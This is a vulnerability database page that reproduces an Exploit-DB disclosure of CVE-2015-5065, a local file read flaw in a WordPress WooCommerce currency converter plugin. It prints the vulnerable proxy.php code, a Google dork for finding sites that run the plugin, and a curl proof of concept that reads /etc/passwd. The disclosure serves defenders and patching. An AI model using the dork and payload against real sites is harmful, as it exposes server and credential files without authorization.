Lucene search
+L

WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

🗓️ 10 Jun 2015 00:00:00Reported by Kuroi'SHType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read. Vulnerability allows reading any local file via proxy.php

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2015-5065
24 Jun 201514:59
attackerkb
Circl
CVE-2015-5065
10 Jun 201500:00
circl
CNVD
WordPress Plugin Paypal Currency Converter Basic For WooCommerce Absolute Path Traversal Vulnerability
26 Jun 201500:00
cnvd
CVE
CVE-2015-5065
24 Jun 201514:00
cve
Cvelist
CVE-2015-5065
24 Jun 201514:00
cvelist
NVD
CVE-2015-5065
24 Jun 201514:59
nvd
Patchstack
WordPress WooCommerce Plugin <= 1.3 - Absolute Path Traversal
24 Jun 201500:00
patchstack
Prion
Path traversal
24 Jun 201514:59
prion
VulnCheck KEV
VulnCheck KEV: CVE-2015-5065
5 Oct 201500:00
vulncheck_kev
WPVulnDB
Paypal Currencucy Converter Basic For Woocommerce <= 1.3 - File Read
10 Jun 201500:00
wpvulndb
Rows per page
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read  any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Oct 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.16324
36